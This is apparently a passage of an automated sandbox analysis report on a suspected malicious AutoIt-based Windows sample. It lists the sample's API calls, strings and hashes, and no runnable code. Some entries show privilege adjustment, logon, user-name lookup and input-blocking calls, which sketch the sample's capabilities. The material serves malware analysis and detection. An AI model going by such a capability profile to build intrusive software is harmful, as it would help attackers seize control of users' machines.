• Instruction Fuzzy Hash: 311182B1D40228BEE7109BE9DD44FAFBBBCEB48710F00466ABA04E7291C2785D0587E5
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 004C4C2C
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 004C4C43
• FreeSid.ADVAPI32(?), ref: 004C4C53
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
• Opcode ID: 5f74f4b8082796be6b3a83536a9d73ee02dddd9a09d5b363379d12a3173cf2c7
• Instruction ID: e1c95b64eedb8cb0ef2d997a41f36a4fa4b2ad83302a9cfb2f145643ec9e46b7
• Opcode Fuzzy Hash: 5f74f4b8082796be6b3a83536a9d73ee02dddd9a09d5b363379d12a3173cf2c7
• Instruction Fuzzy Hash: 38F04F75D1130CBFDF04DFF0DD89AAEB7BCEF08211F004479A501E6182D6746A048B54
APIs
• __time64.LIBCMT ref: 004C8B25
  • Part of subcall function 0048543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,004C91F8,00000000,?,?,?,?,004C93A9,00000000,?), ref: 00485443
  • Part of subcall function 0048543A: __aulldiv.LIBCMT ref: 00485463
Strings
Similarity
• API ID: Time$FileSystem__aulldiv__time64
• String ID: 0uR
• API String ID: 2893107130-201818601
• Opcode ID: f59350d8fd491a055d6d602349670ec0e99a45be41d41f15e6ad36ed3063d7eb
• Instruction ID: b68857d107ac3d43f745f928bff6341b114978c24bdfdb32f9aa4464109ee6b0
• Opcode Fuzzy Hash: f59350d8fd491a055d6d602349670ec0e99a45be41d41f15e6ad36ed3063d7eb
• Instruction Fuzzy Hash: 8321D2726255108BC329CF29D841B52B3E1EFA9311B288E6DE0E5CB2D0DA74BD05DB94
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5e69ebd1bcc3fd0ce73a77168cf58840f1ab81d0a73ab8df18e1b2cadb965d46
• Instruction ID: 151f141dff08bee5f3cd29b1f5bb23b31a08d4683ff6913aa84ecce61d69c11f
• Opcode Fuzzy Hash: 5e69ebd1bcc3fd0ce73a77168cf58840f1ab81d0a73ab8df18e1b2cadb965d46
• Instruction Fuzzy Hash: 5722CF78A00215CFCB24DF55C480AAEB7F1FF15300F14846BE956AB351F778A986CB9A
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 004CC966
• FindClose.KERNEL32(00000000), ref: 004CC996
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: b8e528881881ef3a9d8bcac78ed4f6c5eb6f20a51fd3d1b6e529a45d49842f89
• Instruction ID: 26f97c592cf550f01a211883a64a663aeeae2a4d25255e71ad2304bba177fba9
• Opcode Fuzzy Hash: b8e528881881ef3a9d8bcac78ed4f6c5eb6f20a51fd3d1b6e529a45d49842f89
• Instruction Fuzzy Hash: D011A1766002009FDB10EF29C885A2AF7E9FF84324F04851EF8A9DB391DB74AC05CB85
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,004D977D,?,004EFB84,?), ref: 004CA302
• FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,004D977D,?,004EFB84,?), ref: 004CA314
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
• Opcode ID: c8d37244818da688a32e06cfbc73d219e47a9e279f0866ca44b497414384446a
• Instruction ID: 19778028c8ac3e947c0504f842a589c4c6d9c97ed7d0ccd5958711946e32886c
• Opcode Fuzzy Hash: c8d37244818da688a32e06cfbc73d219e47a9e279f0866ca44b497414384446a
• Instruction Fuzzy Hash: 93F0E23514422DABDB109FA4CC48FEA776DBF08365F00416AFD08D6192D6309914CBA5
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004B8851), ref: 004B8728
• CloseHandle.KERNEL32(?,?,004B8851), ref: 004B873A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 81990902-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,00488F97,?,?,?,00000001), ref: 0048A39A
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0048A3A3
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• BlockInput.USER32(00000001), ref: 004D4218
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
APIs
• mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 004C4EEC
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: mouse_event
• String ID:
• API String ID: 2434400541-0
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,004B88D1), ref: 004B8CB3
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 004A2242
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 0048A36A
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
Memory Dump Source
• Source File: 00000000.00000002.2042218501.00000000010FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 010FB000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10fb000_PI916810.jbxd
APIs
• CharUpperBuffW.USER32(?,?,004EF910), ref: 004E38AF
• IsWindowVisible.USER32(?), ref: 004E38D3
Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BuffCharUpperVisibleWindow
                                                                                                                                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                                                            • API String ID: 4105515805-45149045
                                                                                                                                                                            • Opcode ID: 6fe4b412683738d0d39bce10d171a6b220ee1f7284bd7aa6bcabacc214afa373
                                                                                                                                                                            • Instruction ID: f0b6de09a525017e89dd5a29dfff5dc7aa04fb1fbcada694bb044f66bb34f622
                                                                                                                                                                            • Opcode Fuzzy Hash: 6fe4b412683738d0d39bce10d171a6b220ee1f7284bd7aa6bcabacc214afa373
                                                                                                                                                                            • Instruction Fuzzy Hash: A8D1CA302042458BDB15EF12C455AAE77D6AF94349F10485EB8825B3A3DB38FE4BCB4A
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 004EA89F
                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 004EA8D0
                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 004EA8DC
                                                                                                                                                                            • SetBkColor.GDI32(?,000000FF), ref: 004EA8F6
                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 004EA905
                                                                                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 004EA930
                                                                                                                                                                            • GetSysColor.USER32(00000010), ref: 004EA938
                                                                                                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 004EA93F
                                                                                                                                                                            • FrameRect.USER32(?,?,00000000), ref: 004EA94E
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 004EA955
                                                                                                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 004EA9A0
                                                                                                                                                                            • FillRect.USER32(?,?,?), ref: 004EA9D2
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004EA9FD
                                                                                                                                                                              • Part of subcall function 004EAB60: GetSysColor.USER32(00000012), ref: 004EAB99
                                                                                                                                                                              • Part of subcall function 004EAB60: SetTextColor.GDI32(?,?), ref: 004EAB9D
                                                                                                                                                                              • Part of subcall function 004EAB60: GetSysColorBrush.USER32(0000000F), ref: 004EABB3
                                                                                                                                                                              • Part of subcall function 004EAB60: GetSysColor.USER32(0000000F), ref: 004EABBE
                                                                                                                                                                              • Part of subcall function 004EAB60: GetSysColor.USER32(00000011), ref: 004EABDB
                                                                                                                                                                              • Part of subcall function 004EAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 004EABE9
                                                                                                                                                                              • Part of subcall function 004EAB60: SelectObject.GDI32(?,00000000), ref: 004EABFA
                                                                                                                                                                              • Part of subcall function 004EAB60: SetBkColor.GDI32(?,00000000), ref: 004EAC03
                                                                                                                                                                              • Part of subcall function 004EAB60: SelectObject.GDI32(?,?), ref: 004EAC10
                                                                                                                                                                              • Part of subcall function 004EAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 004EAC2F
                                                                                                                                                                              • Part of subcall function 004EAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004EAC46
                                                                                                                                                                              • Part of subcall function 004EAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 004EAC5B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4124339563-0
                                                                                                                                                                            • Opcode ID: 22c92b85a1a4b572abfe165f4af4b5c57446a0758f9a3ce7f3118f67fc9b8124
                                                                                                                                                                            • Instruction ID: c617a6fc996bffb360233d7c9cd89ec3c6fcd66dca7c7d17e7b2691d88e2af27
                                                                                                                                                                            • Opcode Fuzzy Hash: 22c92b85a1a4b572abfe165f4af4b5c57446a0758f9a3ce7f3118f67fc9b8124
                                                                                                                                                                            • Instruction Fuzzy Hash: E9A1A371008341FFD7109F65DC48A6BBBA9FF88321F104A3AF5529A1E2D734E949CB56
                                                                                                                                                                            APIs
                                                                                                                                                                            • DestroyWindow.USER32(?,?,?), ref: 00462CA2
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00462CE8
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00462CF3
                                                                                                                                                                            • DestroyIcon.USER32(00000000,?,?,?), ref: 00462CFE
                                                                                                                                                                            • DestroyWindow.USER32(00000000,?,?,?), ref: 00462D09
                                                                                                                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 0049C68B
                                                                                                                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0049C6C4
                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0049CAED
                                                                                                                                                                              • Part of subcall function 00461B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00462036,?,00000000,?,?,?,?,004616CB,00000000,?), ref: 00461B9A
                                                                                                                                                                            • SendMessageW.USER32(?,00001053), ref: 0049CB2A
                                                                                                                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0049CB41
                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0049CB57
                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0049CB62
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 464785882-4108050209
                                                                                                                                                                            • Opcode ID: 704cdbedd17e0834f11250c7df0696709c6c43d3d43b7987c3ead34ec19bcc51
                                                                                                                                                                            • Instruction ID: 34bbb3a462849fb93f72efed81554d5c270792342b8c91bdd262bb7779963981
                                                                                                                                                                            • Opcode Fuzzy Hash: 704cdbedd17e0834f11250c7df0696709c6c43d3d43b7987c3ead34ec19bcc51
                                                                                                                                                                            • Instruction Fuzzy Hash: 5712BE30600641EFCB20CF24C9C4BAABBE1BF45310F54457AE985DB262D779EC42CB9A
                                                                                                                                                                            APIs
                                                                                                                                                                            • DestroyWindow.USER32(00000000), ref: 004D77F1
                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004D78B0
                                                                                                                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004D78EE
                                                                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004D7900
                                                                                                                                                                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 004D7946
                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 004D7952
                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 004D7996
                                                                                                                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004D79A5
                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 004D79B5
                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004D79B9
                                                                                                                                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004D79C9
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004D79D2
                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 004D79DB
                                                                                                                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004D7A07
                                                                                                                                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 004D7A1E
                                                                                                                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 004D7A59
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 004D7A6D
                                                                                                                                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 004D7A7E
                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 004D7AAE
                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 004D7AB9
                                                                                                                                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004D7AC4
                                                                                                                                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004D7ACE
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
• String ID: AutoIt v3$DISPLAY$msctls_progress32$static
• API String ID: 2910397461-517079104
• Opcode ID: e29192e701c58d3ede65739b85c0432eeadfa5d3650eb703492265be303d6036
• Instruction ID: 000f423c775e8a839230909b83e0ace8670d750a7ea0a8553c4aefb358ad75fa
• Opcode Fuzzy Hash: e29192e701c58d3ede65739b85c0432eeadfa5d3650eb703492265be303d6036
• Instruction Fuzzy Hash: 37A192B1A00205BFEB10DBA4DC8AFAE7BB9EF45714F104119FA14AB2E1D774AD05CB64
APIs
• SetErrorMode.KERNEL32(00000001), ref: 004CAF89
• GetDriveTypeW.KERNEL32(?,004EFAC0,?,\\.\,004EF910), ref: 004CB066
• SetErrorMode.KERNEL32(00000000,004EFAC0,?,\\.\,004EF910), ref: 004CB1C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
• API String ID: 2907320926-4222207086
• Opcode ID: 3d57503595177abf29b03373f08973bda87f0727883fa7e6acdb8647842a366d
• Instruction ID: de300652327e8b3404d0a2899131eb0a630ffb8768e9ecabb119a70b34f3feb6
• Opcode Fuzzy Hash: 3d57503595177abf29b03373f08973bda87f0727883fa7e6acdb8647842a366d
• Instruction Fuzzy Hash: FF51C638A813459B9B41DB11C953EBD77B0FB54386F28401FE406A7291DB7D9E82C78B
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
• API String ID: 1038674560-86951937
• Opcode ID: ddb223c9f8a87c1289f17a6bf7c9adcc721b05489f7a35ea770b84ce8a4dd3ec
• Instruction ID: a55cdbdf07bb251a2c01a976bdee9437f72b3bd4778d9b9f1d6c2f85d65fdef5
• Opcode Fuzzy Hash: ddb223c9f8a87c1289f17a6bf7c9adcc721b05489f7a35ea770b84ce8a4dd3ec
• Instruction Fuzzy Hash: BA811B70640215EACB14FF62CD92FAF7B58AF11704F04402BF945AA282FB6CEA45C65F
APIs
• GetSysColor.USER32(00000012), ref: 004EAB99
• SetTextColor.GDI32(?,?), ref: 004EAB9D
• GetSysColorBrush.USER32(0000000F), ref: 004EABB3
• GetSysColor.USER32(0000000F), ref: 004EABBE
• CreateSolidBrush.GDI32(?), ref: 004EABC3
• GetSysColor.USER32(00000011), ref: 004EABDB
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 004EABE9
• SelectObject.GDI32(?,00000000), ref: 004EABFA
• SetBkColor.GDI32(?,00000000), ref: 004EAC03
• SelectObject.GDI32(?,?), ref: 004EAC10
• InflateRect.USER32(?,000000FF,000000FF), ref: 004EAC2F
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004EAC46
• GetWindowLongW.USER32(00000000,000000F0), ref: 004EAC5B
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004EACA7
• GetWindowTextW.USER32(00000000,00000000,00000001), ref: 004EACCE
• InflateRect.USER32(?,000000FD,000000FD), ref: 004EACEC
• DrawFocusRect.USER32(?,?), ref: 004EACF7
• GetSysColor.USER32(00000011), ref: 004EAD05
• SetTextColor.GDI32(?,00000000), ref: 004EAD0D
• DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004EAD21
• SelectObject.GDI32(?,004EA869), ref: 004EAD38
• DeleteObject.GDI32(?), ref: 004EAD43
• SelectObject.GDI32(?,?), ref: 004EAD49
• DeleteObject.GDI32(?), ref: 004EAD4E
• SetTextColor.GDI32(?,?), ref: 004EAD54
• SetBkColor.GDI32(?,?), ref: 004EAD5E
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
